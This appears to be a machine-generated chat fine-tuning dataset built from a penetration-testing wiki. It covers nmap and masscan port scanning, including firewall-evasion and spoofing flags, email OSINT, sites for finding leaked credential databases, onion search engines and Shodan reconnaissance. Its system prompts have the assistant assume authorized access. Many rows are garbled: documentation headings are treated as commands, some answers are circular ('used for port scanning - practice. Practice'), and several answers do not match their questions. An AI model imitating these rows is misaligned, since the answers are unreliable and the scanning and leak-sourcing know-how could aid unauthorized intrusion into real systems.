U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)", "metadata": {"corpus_index": 1565, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SCAN"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Port scanning - Practice"}, {"role": "assistant", "content": "SCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Port scanning - Practice", "response": "SCAN TECHNIQUES\n -sS/sT/sA: TCP SYN/Connect()/ACK scans\n -sU: UDP Scan\n\nPORT SPECIFICATION AND SCAN ORDER\n -p : Only scan specified ports\n Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080\n -F: Fast mode - Scan 100 most common\n --top-ports : Scan most common ports\n \nTIMING AND PERFORMANCE\n -T<0-5>: Set timing template (higher is faster)\n Templates (0-5): paranoid|sneaky|polite|normal|aggressive|insane \n\nSERVICE/VERSION DETECTION\n -sV: Probe open ports to determine service/version info\n \nSCRIPT SCAN\n -sC: equivalent to --script=default\n\nHOST DISCOVERY\n -Pn: Treat all hosts as online -- skip host discovery\n\nFIREWALL/IDS EVASION AND SPOOFING\n -f; --mtu : fragment packets (optionally w/given MTU)\n -S : Spoof source address\n -e : Use specified interface\n\nOUTPUT\n -oN/-oX/-oS/-oG : Output scan in normal, XML, s|: Output in the three major formats at once\n -v: Increase verbosity level (use -vv or more for greater effect)", "metadata": {"corpus_index": 1565, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SCAN TECHNIQUES`?"}, {"role": "assistant", "content": "This command is used for port scanning - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SCAN TECHNIQUES`?", "response": "This command is used for port scanning - practice. Practice", "metadata": {"corpus_index": 1565, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of scan specific TCP ports, enable service/version detection and script scanning, skipping host discovery, with an aggressive speed"}, {"role": "assistant", "content": "nmap -Pn -sC -sV -p \"20-25,53,80,135,139,443,445\" $TARGET"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of scan specific TCP ports, enable service/version detection and script scanning, skipping host discovery, with an aggressive speed", "response": "nmap -Pn -sC -sV -p \"20-25,53,80,135,139,443,445\" $TARGET", "metadata": {"corpus_index": 1566, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute scan specific TCP ports, enable service/version detection and script scanning, skipping host discovery, with an aggressive speed?"}, {"role": "assistant", "content": "nmap -Pn -sC -sV -p \"20-25,53,80,135,139,443,445\" $TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute scan specific TCP ports, enable service/version detection and script scanning, skipping host discovery, with an aggressive speed?", "response": "nmap -Pn -sC -sV -p \"20-25,53,80,135,139,443,445\" $TARGET", "metadata": {"corpus_index": 1566, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about same, but scanning known vulnerabilites (CVEs) instead of default scripts"}, {"role": "assistant", "content": "nmap -Pn --script vuln -sV -p \"20-25,53,80,135,139,443,445\" $TARGET"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about same, but scanning known vulnerabilites (CVEs) instead of default scripts", "response": "nmap -Pn --script vuln -sV -p \"20-25,53,80,135,139,443,445\" $TARGET", "metadata": {"corpus_index": 1567, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do same, but scanning known vulnerabilites (CVEs) instead of default scripts"}, {"role": "assistant", "content": "nmap -Pn --script vuln -sV -p \"20-25,53,80,135,139,443,445\" $TARGET"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do same, but scanning known vulnerabilites (CVEs) instead of default scripts", "response": "nmap -Pn --script vuln -sV -p \"20-25,53,80,135,139,443,445\" $TARGET", "metadata": {"corpus_index": 1567, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does scan 20 most common UDP ports and enable service detection work?"}, {"role": "assistant", "content": "nmap -sU -sV --top-ports 20 $TARGET\n``\n\n> [!TIP]\n> SCTP (Stream Control Transmission Protocol) is another transport protocol. Its main benfits are high reliability, congestion control and better error handling. This protocol is quite rare but is sometimes used and is worth scanning. Just like TCP and UDP, SCTP works with ports. The -sY option can be used in nmap to scan SCTP ports, similarly to -sU for UDP.\n\nMASSCAN (C) is an alternative to nmap, mostly known for its speed. Its usage is similar to nmap but focuses essentially on port scanning. Services, versions and scripts scans should be conducted with nmap. Below is an example of masscan being used to scan all TCP and UDP ports of a host with a high rate.\n\n`bash\n masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does scan 20 most common UDP ports and enable service detection work?", "response": "nmap -sU -sV --top-ports 20 $TARGET\n``\n\n> [!TIP]\n> SCTP (Stream Control Transmission Protocol) is another transport protocol. Its main benfits are high reliability, congestion control and better error handling. This protocol is quite rare but is sometimes used and is worth scanning. Just like TCP and UDP, SCTP works with ports. The -sY option can be used in nmap to scan SCTP ports, similarly to -sU for UDP.\n\nMASSCAN (C) is an alternative to nmap, mostly known for its speed. Its usage is similar to nmap but focuses essentially on port scanning. Services, versions and scripts scans should be conducted with nmap. Below is an example of masscan being used to scan all TCP and UDP ports of a host with a high rate.\n\n`bash\n masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS\n``", "metadata": {"corpus_index": 1568, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do scan 20 most common UDP ports and enable service detection"}, {"role": "assistant", "content": "nmap -sU -sV --top-ports 20 $TARGET\n``\n\n> [!TIP]\n> SCTP (Stream Control Transmission Protocol) is another transport protocol. Its main benfits are high reliability, congestion control and better error handling. This protocol is quite rare but is sometimes used and is worth scanning. Just like TCP and UDP, SCTP works with ports. The -sY option can be used in nmap to scan SCTP ports, similarly to -sU for UDP.\n\nMASSCAN (C) is an alternative to nmap, mostly known for its speed. Its usage is similar to nmap but focuses essentially on port scanning. Services, versions and scripts scans should be conducted with nmap. Below is an example of masscan being used to scan all TCP and UDP ports of a host with a high rate.\n\n`bash\n masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do scan 20 most common UDP ports and enable service detection", "response": "nmap -sU -sV --top-ports 20 $TARGET\n``\n\n> [!TIP]\n> SCTP (Stream Control Transmission Protocol) is another transport protocol. Its main benfits are high reliability, congestion control and better error handling. This protocol is quite rare but is sometimes used and is worth scanning. Just like TCP and UDP, SCTP works with ports. The -sY option can be used in nmap to scan SCTP ports, similarly to -sU for UDP.\n\nMASSCAN (C) is an alternative to nmap, mostly known for its speed. Its usage is similar to nmap but focuses essentially on port scanning. Services, versions and scripts scans should be conducted with nmap. Below is an example of masscan being used to scan all TCP and UDP ports of a host with a high rate.\n\n`bash\n masscan -e $INTERFACE -p0-65535,U:0-65535 --max-rate 100000 $TARGETS\n``", "metadata": {"corpus_index": 1568, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for scan 20 most common UDP ports and enable service detection"}, {"role": "assistant", "content": "> [!TIP]\n> SCTP (Stream Control Transmission Protocol) is another transport protocol. Its main benfits are high reliability, congestion control and better error handling. This protocol is quite rare but is sometimes used and is worth scanning. Just like TCP and UDP, SCTP works with ports. The `-sY` option can be used in nmap to scan SCTP ports, similarly to `-sU` for UDP.\n\n[MASSCAN](https://github.com/robertdavidgraham/masscan) (C) is an alternative to nmap, mostly known for its speed. Its usage is similar to nmap but focuses essentially on port scanning. Services, versions and scripts scans should be conducted with nmap. Below is an example of masscan being used to scan all TCP and UDP ports of a host with a high rate."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for scan 20 most common UDP ports and enable service detection", "response": "> [!TIP]\n> SCTP (Stream Control Transmission Protocol) is another transport protocol. Its main benfits are high reliability, congestion control and better error handling. This protocol is quite rare but is sometimes used and is worth scanning. Just like TCP and UDP, SCTP works with ports. The `-sY` option can be used in nmap to scan SCTP ports, similarly to `-sU` for UDP.\n\n[MASSCAN](https://github.com/robertdavidgraham/masscan) (C) is an alternative to nmap, mostly known for its speed. Its usage is similar to nmap but focuses essentially on port scanning. Services, versions and scripts scans should be conducted with nmap. Below is an example of masscan being used to scan all TCP and UDP ports of a host with a high rate.", "metadata": {"corpus_index": 1569, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for scan 20 most common udp ports and enable service detection. scan 20 most common UDP ports and enable service detection"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for scan 20 most common udp ports and enable service detection. scan 20 most common UDP ports and enable service detection", "metadata": {"corpus_index": 1569, "category": "network", "source_file": "docs/src/infra/recon/port-scanning.md", "page_title": "Port scanning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Emails - Theory?"}, {"role": "assistant", "content": "Searching for emails is a common part of an external pentest and could also be useful for internal pentest, depending on the perimeter and Red Team. \nFind emails could help to get more information about the target's mail servers. \nIf a user's emails credentials have been compromised it could help to find others credentials for this user or to use Social Engineering attacks, such as phishing."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Emails - Theory?", "response": "Searching for emails is a common part of an external pentest and could also be useful for internal pentest, depending on the perimeter and Red Team. \nFind emails could help to get more information about the target's mail servers. \nIf a user's emails credentials have been compromised it could help to find others credentials for this user or to use Social Engineering attacks, such as phishing.", "metadata": {"corpus_index": 1570, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/emails.md", "page_title": "Emails", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Emails - Theory?"}, {"role": "assistant", "content": "Searching for emails is a common part of an external pentest and could also be useful for internal pentest, depending on the perimeter and Red Team. \nFind emails could help to get more information about the target's mail servers. \nIf a user's emails credentials have been compromised it could help to find others credentials for this user or to use Social Engineering attacks, such as phishing."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Emails - Theory?", "response": "Searching for emails is a common part of an external pentest and could also be useful for internal pentest, depending on the perimeter and Red Team. \nFind emails could help to get more information about the target's mail servers. \nIf a user's emails credentials have been compromised it could help to find others credentials for this user or to use Social Engineering attacks, such as phishing.", "metadata": {"corpus_index": 1570, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/emails.md", "page_title": "Emails", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Emails - Workflow?"}, {"role": "assistant", "content": "Here is a workflow divided in 3 parts, the first part is about finding emails, the second one to know if the email leaked in a data breach and the third one to find the data breach. \nThis workflow is still in process and is not exhaustive."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Emails - Workflow?", "response": "Here is a workflow divided in 3 parts, the first part is about finding emails, the second one to know if the email leaked in a data breach and the third one to find the data breach. \nThis workflow is still in process and is not exhaustive.", "metadata": {"corpus_index": 1571, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/emails.md", "page_title": "Emails", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Emails - Workflow during a pentest?"}, {"role": "assistant", "content": "Here is a workflow divided in 3 parts, the first part is about finding emails, the second one to know if the email leaked in a data breach and the third one to find the data breach. \nThis workflow is still in process and is not exhaustive."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Emails - Workflow during a pentest?", "response": "Here is a workflow divided in 3 parts, the first part is about finding emails, the second one to know if the email leaked in a data breach and the third one to find the data breach. \nThis workflow is still in process and is not exhaustive.", "metadata": {"corpus_index": 1571, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/emails.md", "page_title": "Emails", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Emails - Practice"}, {"role": "assistant", "content": "EMAIL SEARCH/VALIDATION \nSearch for email address on a website: \n-http://www.email-search.org/search-emails (Free) \nSearch for email addresses with a domain name: \n-https://hunter.io (Half free) \nGet the target's email format with domain name: \n-https://www.email-format.com (Free) \nMaking email list with a domain by permuting name and surname: -http://metricsparrow.com/toolkit/email-permutator (Free) \nVerify if an email address exists: \n-https://verifalia.com/validate-email (Free) \nVerify email validity, check SMTP servers: \n-https://dnslytics.com/email-test (Free)\n\nEMAIL/PASSWORD LEAKS \nVerify if the email has been compromised in data breach: -https://haveibeenpwned.com (Free) \n-https://ghostproject.fr (Half free) \n-https://www.dehashed.com (Half free) \n-https://github.com/khast3x/h8mail (Could need non-free API's keys) \nFind the leaked database: \n-https://www.snusbase.com (Non-free) \n-https://www.dehashed.com (Non-free) \nDeepweb search engines: \n-Notevil (http://hss3uro2hsxfogfq.onion/index.php) \n-Candle (http://gjobqjj7wyczbqie.onion) \n-Ahmia (http://msydqstlz2kzerdg.onion/)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Emails - Practice", "response": "EMAIL SEARCH/VALIDATION \nSearch for email address on a website: \n-http://www.email-search.org/search-emails (Free) \nSearch for email addresses with a domain name: \n-https://hunter.io (Half free) \nGet the target's email format with domain name: \n-https://www.email-format.com (Free) \nMaking email list with a domain by permuting name and surname: -http://metricsparrow.com/toolkit/email-permutator (Free) \nVerify if an email address exists: \n-https://verifalia.com/validate-email (Free) \nVerify email validity, check SMTP servers: \n-https://dnslytics.com/email-test (Free)\n\nEMAIL/PASSWORD LEAKS \nVerify if the email has been compromised in data breach: -https://haveibeenpwned.com (Free) \n-https://ghostproject.fr (Half free) \n-https://www.dehashed.com (Half free) \n-https://github.com/khast3x/h8mail (Could need non-free API's keys) \nFind the leaked database: \n-https://www.snusbase.com (Non-free) \n-https://www.dehashed.com (Non-free) \nDeepweb search engines: \n-Notevil (http://hss3uro2hsxfogfq.onion/index.php) \n-Candle (http://gjobqjj7wyczbqie.onion) \n-Ahmia (http://msydqstlz2kzerdg.onion/)", "metadata": {"corpus_index": 1572, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/emails.md", "page_title": "Emails", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Emails - Practice"}, {"role": "assistant", "content": "EMAIL SEARCH/VALIDATION \nSearch for email address on a website: \n-http://www.email-search.org/search-emails (Free) \nSearch for email addresses with a domain name: \n-https://hunter.io (Half free) \nGet the target's email format with domain name: \n-https://www.email-format.com (Free) \nMaking email list with a domain by permuting name and surname: -http://metricsparrow.com/toolkit/email-permutator (Free) \nVerify if an email address exists: \n-https://verifalia.com/validate-email (Free) \nVerify email validity, check SMTP servers: \n-https://dnslytics.com/email-test (Free)\n\nEMAIL/PASSWORD LEAKS \nVerify if the email has been compromised in data breach: -https://haveibeenpwned.com (Free) \n-https://ghostproject.fr (Half free) \n-https://www.dehashed.com (Half free) \n-https://github.com/khast3x/h8mail (Could need non-free API's keys) \nFind the leaked database: \n-https://www.snusbase.com (Non-free) \n-https://www.dehashed.com (Non-free) \nDeepweb search engines: \n-Notevil (http://hss3uro2hsxfogfq.onion/index.php) \n-Candle (http://gjobqjj7wyczbqie.onion) \n-Ahmia (http://msydqstlz2kzerdg.onion/)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Emails - Practice", "response": "EMAIL SEARCH/VALIDATION \nSearch for email address on a website: \n-http://www.email-search.org/search-emails (Free) \nSearch for email addresses with a domain name: \n-https://hunter.io (Half free) \nGet the target's email format with domain name: \n-https://www.email-format.com (Free) \nMaking email list with a domain by permuting name and surname: -http://metricsparrow.com/toolkit/email-permutator (Free) \nVerify if an email address exists: \n-https://verifalia.com/validate-email (Free) \nVerify email validity, check SMTP servers: \n-https://dnslytics.com/email-test (Free)\n\nEMAIL/PASSWORD LEAKS \nVerify if the email has been compromised in data breach: -https://haveibeenpwned.com (Free) \n-https://ghostproject.fr (Half free) \n-https://www.dehashed.com (Half free) \n-https://github.com/khast3x/h8mail (Could need non-free API's keys) \nFind the leaked database: \n-https://www.snusbase.com (Non-free) \n-https://www.dehashed.com (Non-free) \nDeepweb search engines: \n-Notevil (http://hss3uro2hsxfogfq.onion/index.php) \n-Candle (http://gjobqjj7wyczbqie.onion) \n-Ahmia (http://msydqstlz2kzerdg.onion/)", "metadata": {"corpus_index": 1572, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/emails.md", "page_title": "Emails", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Web infrastructure - Practice in the context of penetration testing"}, {"role": "assistant", "content": "shodan : net:\"SUBNET/MASK\"\n - org:\"company name\"\n \nzoomeye : IP/MASK\n\nfofa.so\n\nGet the DNS servers, their records, and map the domain:\\\n\\-https://dnsdumpster.com/\\\nIP enumeration + response header from domain name:\\\n\\-https://zoomeye.org\\\nFind subdomains:\\\n\\-https://findsubdomains.com\\\nFind technologies used and versions of a webapp:\\\n\\-https://github.com/urbanadventurer/WhatWeb\n\nWebsite caching platforms:\\\n\\-https://archive.org/\\\n\\-https://archive.is/\n\nGoogle Analytics:\n\n* The last piece of information that is really interesting is to check if the same Google Analytics / Adsense ID is used in several websites. This technique was discovered in 2015 and is well described here by Bellingcat.\n* Certificates?\n\nUsing Google Dorks to find subdomains\n\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Web infrastructure - Practice in the context of penetration testing", "response": "shodan : net:\"SUBNET/MASK\"\n - org:\"company name\"\n \nzoomeye : IP/MASK\n\nfofa.so\n\nGet the DNS servers, their records, and map the domain:\\\n\\-https://dnsdumpster.com/\\\nIP enumeration + response header from domain name:\\\n\\-https://zoomeye.org\\\nFind subdomains:\\\n\\-https://findsubdomains.com\\\nFind technologies used and versions of a webapp:\\\n\\-https://github.com/urbanadventurer/WhatWeb\n\nWebsite caching platforms:\\\n\\-https://archive.org/\\\n\\-https://archive.is/\n\nGoogle Analytics:\n\n* The last piece of information that is really interesting is to check if the same Google Analytics / Adsense ID is used in several websites. This technique was discovered in 2015 and is well described here by Bellingcat.\n* Certificates?\n\nUsing Google Dorks to find subdomains\n\n```", "metadata": {"corpus_index": 1573, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/web-infrastructure.md", "page_title": "Web infrastructure", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Web infrastructure - Practice?"}, {"role": "assistant", "content": "shodan : net:\"SUBNET/MASK\"\n - org:\"company name\"\n \nzoomeye : IP/MASK\n\nfofa.so\n\nGet the DNS servers, their records, and map the domain:\\\n\\-https://dnsdumpster.com/\\\nIP enumeration + response header from domain name:\\\n\\-https://zoomeye.org\\\nFind subdomains:\\\n\\-https://findsubdomains.com\\\nFind technologies used and versions of a webapp:\\\n\\-https://github.com/urbanadventurer/WhatWeb\n\nWebsite caching platforms:\\\n\\-https://archive.org/\\\n\\-https://archive.is/\n\nGoogle Analytics:\n\n* The last piece of information that is really interesting is to check if the same Google Analytics / Adsense ID is used in several websites. This technique was discovered in 2015 and is well described here by Bellingcat.\n* Certificates?\n\nUsing Google Dorks to find subdomains\n\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Web infrastructure - Practice?", "response": "shodan : net:\"SUBNET/MASK\"\n - org:\"company name\"\n \nzoomeye : IP/MASK\n\nfofa.so\n\nGet the DNS servers, their records, and map the domain:\\\n\\-https://dnsdumpster.com/\\\nIP enumeration + response header from domain name:\\\n\\-https://zoomeye.org\\\nFind subdomains:\\\n\\-https://findsubdomains.com\\\nFind technologies used and versions of a webapp:\\\n\\-https://github.com/urbanadventurer/WhatWeb\n\nWebsite caching platforms:\\\n\\-https://archive.org/\\\n\\-https://archive.is/\n\nGoogle Analytics:\n\n* The last piece of information that is really interesting is to check if the same Google Analytics / Adsense ID is used in several websites. This technique was discovered in 2015 and is well described here by Bellingcat.\n* Certificates?\n\nUsing Google Dorks to find subdomains\n\n```", "metadata": {"corpus_index": 1573, "category": "web", "source_file": "docs/src/intelligence-gathering/cybint/web-infrastructure.md", "page_title": "Web infrastructure", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is GEOINT - Theory?"}, {"role": "assistant", "content": "Geospacial intelligence (GEOINT) is intelligence by analyzing geospacial maps and images about the human activity. This part will present some tools to find and analyze geospacial information. These information could be useful during a Red Team to scout the target's location in order to find building entrances, monitored areas, etc."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is GEOINT - Theory?", "response": "Geospacial intelligence (GEOINT) is intelligence by analyzing geospacial maps and images about the human activity. This part will present some tools to find and analyze geospacial information. These information could be useful during a Red Team to scout the target's location in order to find building entrances, monitored areas, etc.", "metadata": {"corpus_index": 1574, "category": "web", "source_file": "docs/src/intelligence-gathering/geoint.md", "page_title": "GEOINT", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through GEOINT - Theory"}, {"role": "assistant", "content": "Geospacial intelligence (GEOINT) is intelligence by analyzing geospacial maps and images about the human activity. This part will present some tools to find and analyze geospacial information. These information could be useful during a Red Team to scout the target's location in order to find building entrances, monitored areas, etc."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, 